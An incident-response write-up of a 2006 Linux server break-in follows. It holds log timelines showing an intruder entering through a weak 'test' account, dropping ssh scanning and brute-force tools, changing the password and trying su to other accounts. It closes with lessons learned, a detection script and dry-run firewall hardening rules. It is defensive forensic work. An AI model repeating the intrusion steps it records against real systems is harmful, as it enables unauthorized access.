2006/03/06 22:28:39	82.79.137.22		Mar  6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro  user=test
2006/03/06 22:28:41	82.79.137.22		Mar  6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43	82.79.137.22 	*	Mar  6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43	82.79.137.22	*	Mar  6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28	82.79.137.22	*	test   pts/2        82.79.137.22     Mon Mar  6 22:28 - 00:21  (01:52)
2006/03/06 22:31:06	82.79.137.18		Mar  6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14	82.79.137.7	*	vsftpd: Mon Mar  6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client 		"82.79.137.7"
2006/03/06 22:40:54	82.79.137.22	*!	Mar 06 06 22:40:54   167818 m.. -rw-r--r-- test     test     /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35	82.79.137.22	*!	Mar 06 06 23:12:35   846832 m.. -rwxr-xr-x test     test     /home/test/scaner/ssh-scan
2006/03/06 23:23:56	82.79.137.22	*!	Mar 06 06 23:23:56    23714 m.. -rwxr-xr-x test     test     /home/test/scaner/go
2006/03/06 00:03:34	82.79.137.22	*!	Mar 07 06 00:03:34   846520 m.. -rwxr-xr-x test     test     /home/test/scaner/sshf
2006/03/06 00:03:34	82.79.137.22	*!	                       4096 m.. drwxr-xr-x test     test     /home/test/scaner
2006/03/06 00:03:34	82.79.137.22	*!	                     458068 m.. -rwxr-xr-x test     test     /home/test/scaner/ss
						skycode  pts/3        213.186.53.55    Tue Mar  7 00:14 - down   (00:45)
2006/03/07 00:21:24	82.79.137.22	*	Mar  7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
						skycode  pts/2        213.186.53.55    Tue Mar  7 00:58 - down   (00:01)
						runlevel (to lvl 6)   Tue Mar  7 00:59 - 00:59  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 00:59 - 01:02  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 01:04 - 01:04  (00:00)     213.186.53.55
						skycode  pts/0        Tue Mar  7 08:28 - down   (00:16)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 08:45 - 08:45  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 08:45 - 08:48  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 08:56 - down   (00:22)     213.186.53.55
						skycode  pts/1        Tue Mar  7 09:17 - down   (00:01)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 09:18 - 09:18  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:18 - 09:22  (00:03)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:23 - down   (00:01)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:25 - 09:25  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:25 - 09:28  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:34 - down   (00:09)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:44 - 09:44  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:44 - 09:48  (00:04)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386


2006/03/09 14:57:31	82.79.137.27	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client 		"82.79.137.27"
2006/03/09 14:57:31	82.79.137.26	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client 		"82.79.137.26"
2006/03/09 14:57:31	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:31	82.79.137.7	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client 		"82.79.137.7"
2006/03/09 14:57:33	82.79.137.28	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client 		"82.79.137.28"
2006/03/09 14:57:33	82.79.137.30	*	vsftpd: Thu Mar  9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client 		"82.79.137.30"
2006/03/09 15:01:29	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30	82.79.137.30		30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34	82.79.137.6		Mar  9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36	82.79.137.6		vsftpd: Thu Mar  9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client 	"82.79.137.6"
2006/03/09 15:01:37	82.79.137.27		Mar  9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39	82.79.137.27		vsftpd: Thu Mar  9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/09 15:01:45	82.79.137.18	*	vsftpd: Thu Mar  9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client 		"82.79.137.18"
2006/03/09 15:01:47	82.79.137.9	*	vsftpd: Thu Mar  9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client 		"82.79.137.9"
2006/03/09 15:02:07	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08	82.79.137.20		20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36	82.79.137.18		18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"


						ratibus  pts/2        82.233.38.20     Thu Mar 16 23:13 - 23:14  (00:00)
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32	193.230.222.209	*	Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12	193.230.222.209	*	test     pts/2        193.230.222.209  Fri Mar 17 00:12 - 00:30  (00:18)
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45	193.230.222.209	*!!	Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35	193.230.222.209	*	Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 00:15 - 00:15  (00:00)
2006/03/17 00:15:52	193.230.222.209	*	Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28	193.230.222.209	*.	Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30	193.230.222.209	*.	Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36	193.230.222.209	*.	Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=vinoj
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38	193.230.222.209	*.	Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42	193.230.222.209	.*	Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net  user=croulants
2006/03/17 00:18:45	193.230.222.209	.*	Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51	193.230.222.209	.*	Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59	193.230.222.209	.*	Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10	193.230.222.209	.*	Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50	193.230.222.209	*.	Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52	193.230.222.209	*.	Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57	193.230.222.209	*.	Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59	193.230.222.209	*.	Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04	193.230.222.209	*.	Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost=  user=trollingsecours
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06	193.230.222.209	*.	Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28	193.230.222.253		193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33	193.230.222.209	*	Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 00:28 - 00:30  (00:01)
2006/03/17 00:28:40	193.230.222.209	*!	Mar 17 06 00:28:40        0 ..c crw--w---- test     tty      /dev/pts/5
2006/03/17 00:29:02	193.230.222.209	*!	Mar 17 06 00:29:02        0 .a. crw--w---- test     tty      /dev/pts/5
2006/03/17 00:30:31	193.230.222.209	*	Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33	193.230.222.209	*	Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
						Mar 17 06 06:35:02        0 m.c prw-r----- root     adm      /dev/xconsole

2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52	193.230.222.209	*	Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 09:00 - 09:38  (00:37)
2006/03/17 09:03:43	193.230.222.209	*!	Mar 17 06 09:03:43        0 ..c crw--w---- test     tty      /dev/pts/6
2006/03/17 09:03:58	193.230.222.209	*!	Mar 17 06 09:03:58        0 .a. crw--w---- test     tty      /dev/pts/6
2006/03/17 09:38:33	193.230.222.209	*	Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test

2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43	193.230.222.209	*	Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 12:19 - 14:25  (02:05)
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01	193.230.222.209	*	Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 12:26 - 14:30  (02:04)
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44	193.230.222.209	*	Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32	193.230.222.209	*	test     pts/7        193.230.222.209  Fri Mar 17 12:32 - 16:26  (03:53)
2006/03/17 14:25:38	193.230.222.209	*	Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58	193.230.222.209	*	Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43	193.230.222.209	*	Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36	193.230.222.209	*	test     pts/3        193.230.222.209  Fri Mar 17 14:36 - 16:49  (02:12)
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56	193.230.222.209	*	Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00	193.230.222.209	*	test     pts/4        193.230.222.209  Fri Mar 17 15:00 - 17:12  (02:12)
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26	193.230.222.209	*	Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03	193.230.222.209	*	test     pts/8        193.230.222.209  Fri Mar 17 15:03 - 15:14  (00:10)
2006/03/17 15:14:06	193.230.222.209	*	Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40	193.230.222.209	*	Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15	193.230.222.209	*	Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46	193.230.222.209	*	Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17 17:18			#	## First mails blocked... no contact outside is possible via the default IP source
						Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
						skycode  pts/3        213.49.238.76    Fri Mar 17 19:30   still logged in
						Mar 17 06 19:30:39        0 ..c crw--w---- skycode  tty      /dev/pts/3
						Mar 17 19:30:50 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2
						skycode  pts/4        213.49.238.76    Fri Mar 17 19:33   still logged in
						Mar 17 06 19:33:45        0 ..c crw--w---- skycode  tty      /dev/pts/4
						Mar 17 19:34:41 localhost sudo:  skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash
2006/03/17 19:37:19			 !	Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
						Mar 17 06 19:38:16        0 ..c crw--w---- root     tty      /dev/pts/7
2006/03/17 19:39:21			 !!	Mar 17 06 19:39:21     2467 m.c -rw-r----- root     shadow   /etc/shadow		= test:$ passwd?
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
2006/03/17 19:39:21			 !!	Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed
2006/03/17 19:40:12			 !	Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test

2006/03/17 19:40:19			 !	Mar 17 06 19:40:19     4096 m.. drwxr-xr-x test     test     /home/test
2006/03/17 19:40:19			 !	                       4096 m.. drwx------ test     test     /home/test/.mc/cedit	= test:$ mc?
2006/03/17 19:40:25			 !	Mar 17 06 19:40:25        0 m.. -rw-r--r-- test     test     /home/test/.mc/history	but test not logged in normally
2006/03/17 19:40:25			 !	                         35 m.. -rw-r--r-- test     test     /home/test/.mc/Tree	or via ./go??
2006/03/17 19:40:25			 !	                       4096 m.. drwxr-xr-x test     test     /home/test/.mc
2006/03/17 19:40:25			 !	                         32 m.. -rw-r--r-- test     test     /home/test/.mc/filepos
						=> /tmp/crontab.Hq7als/crontab 1;0
						=> corresponds to crontab -e in .bash_history?...
2006/03/17 19:40:25			 !	                       1945 m.. -rw-r--r-- test     test     /home/test/.mc/ini
2006/03/17 19:40:31			 !	Mar 17 06 19:40:31     2117 m.. -rw------- test     test     /home/test/.bash_history
						phil     pts/8        85.234.194.12    Fri Mar 17 20:08 - 20:19  (00:11)
						phil     pts/8        85.234.194.12    Fri Mar 17 20:20   still logged in
						phil     pts/14       85.234.194.12    Fri Mar 17 21:14   still logged in
						skycode  pts/15       213.49.238.76    Fri Mar 17 21:39   still logged in
						Mar 17 06 21:05:08        0 m.. crw--w---- root     tty      /dev/pts/12
						                          0 m.. crw------- phil     tty      /dev/pts/8
						Mar 17 06 21:05:09        0 m.. crw--w---- test     tty      /dev/pts/5
						Mar 17 06 21:05:10        0 ma. crw-rw-rw- root     tty      /dev/ptmx
						                          0 m.. crw--w---- test     tty      /dev/pts/6
						                          0 .a. crw------- phil     tty      /dev/pts/8
						                          0 .a. crw-rw-rw- root     tty      /dev/tty
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1
2006/03/17 21:10:59			 #	user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1
2006/03/17 21:28:56			 #	Mar 17 21:28:56 localhost -- MARK --
2006/03/17 21:30:03			 #	last occurrence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0
2006/03/17 21:30:03			 #	last occurrence of 20060317 213003 probe ended
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:45:04			 #	Mar 17 21:45:04 localhost last message repeated 3 times
2006/03/17 21:48:56			 #	## No MARK at 21:48:56
2006/03/17 21:50:05			 #	Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1
2006/03/17 21:55			 #	## No snmp at 21:55

TODO:
=====
ftp repository of test??
/var/cache/tct
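
The `*!!` entries in the timeline (password for test changed 13 seconds after the accepted login from 193.230.222.209) can be found automatically. The script below is an added example, not part of the original analysis; the 60-second window and the function names are assumptions, and the sample lines are copied from the timeline above.

```shell
#!/bin/sh
# Added example: flag a password change that follows an accepted ssh login
# for the same account within WINDOW seconds.
WINDOW=60   # assumed threshold, in seconds

# Sample input: four auth.log lines copied from the timeline above.
sample_log() {
cat <<'EOF'
Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
EOF
}

# Reads syslog auth lines on stdin; prints "user ip delay_seconds" per hit.
# Login and password change must carry the same month/day stamp, so a pair
# that straddles midnight is not reported.
flag_quick_passwd_change() {
    awk -v window="$WINDOW" '
    { split($3, t, ":"); now = t[1] * 3600 + t[2] * 60 + t[3]; day = $1 " " $2 }
    $5 ~ /^sshd\[/ && $6 == "Accepted" {
        login[$9] = now; lday[$9] = day; src[$9] = $11; next
    }
    $5 ~ /^passwd\[/ && /password changed for/ {
        user = $NF
        if (user in login && lday[user] == day && now - login[user] <= window)
            print user, src[user], now - login[user]
    }'
}

sample_log | flag_quick_passwd_change
```

The 19:39:21 password change, made from the administrators' root session during the response, is not reported because no ssh login for test precedes it within the window.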

Conclusions

  • Initial breach
    • automatic tool scanning ftp accounts could enter with the 'test' account
    • manual attempt to log in with the 'test' account
    • download of sniffers and brute-force tools for ssh
    • transfers over ftp
    • change test password
    • 82.79.137.NN = NN.metronetwork.rdsbz.ro
    • 193.230.222.209 = 209-nat.s-man.net
  • Counter-measures
    • don't use dummy passwords ;-)
    • don't grant ftp/ssh rights per default
      sshd: make use of the "AllowUsers" keyword and explicitly add users when needed
    • don't grant internet access per default
      iptables: cf. --uid-owner and other --XXX-owner options
      on the OUTPUT chain to avoid download of malicious code
      on the INPUT chain to avoid bindshells
  • Timeline
    • Before and during the live forensic analysis we should have written down our own actions and the observable elements rather than having to deduce them from the logs.
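
The counter-measures above, sketched as a dry-run generator that only prints the sshd_config line and the iptables commands for review. This is an added example, not configuration taken from the incident host; the accounts admin1/admin2, the inbound port list and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): prints the rules, applies nothing.
# Assumed names: admin1/admin2 (placeholder accounts) and the inbound ports.

# sshd_config line: only the listed accounts may log in over ssh, so a
# forgotten account such as 'test' gets no shell even with a weak password.
sshd_allowusers_line() {
    echo "AllowUsers $*"
}

# OUTPUT chain: the owner match works only on locally generated packets
# (OUTPUT/POSTROUTING). Log, then reject, NEW outbound connections per uid;
# loopback is accepted first and established flows are not matched.
egress_rules() {
    echo "iptables -A OUTPUT -o lo -j ACCEPT"
    for u in "$@"; do
        echo "iptables -A OUTPUT -m owner --uid-owner $u -m conntrack --ctstate NEW -j LOG --log-prefix egress-$u:"
        echo "iptables -A OUTPUT -m owner --uid-owner $u -m conntrack --ctstate NEW -j REJECT"
    done
}

# INPUT chain: the owner match is not available for inbound packets, so
# bindshells are handled with an allowlist of proto/port pairs; a listener
# on any other port is unreachable. The DROP policy is set last to avoid
# cutting off the session that applies the rules.
ingress_rules() {
    echo "iptables -A INPUT -i lo -j ACCEPT"
    echo "iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
    for spec in "$@"; do
        echo "iptables -A INPUT -p ${spec%/*} --dport ${spec#*/} -m conntrack --ctstate NEW -j ACCEPT"
    done
    echo "iptables -P INPUT DROP"
}

sshd_allowusers_line admin1 admin2
egress_rules test
ingress_rules tcp/22 udp/53 tcp/53
```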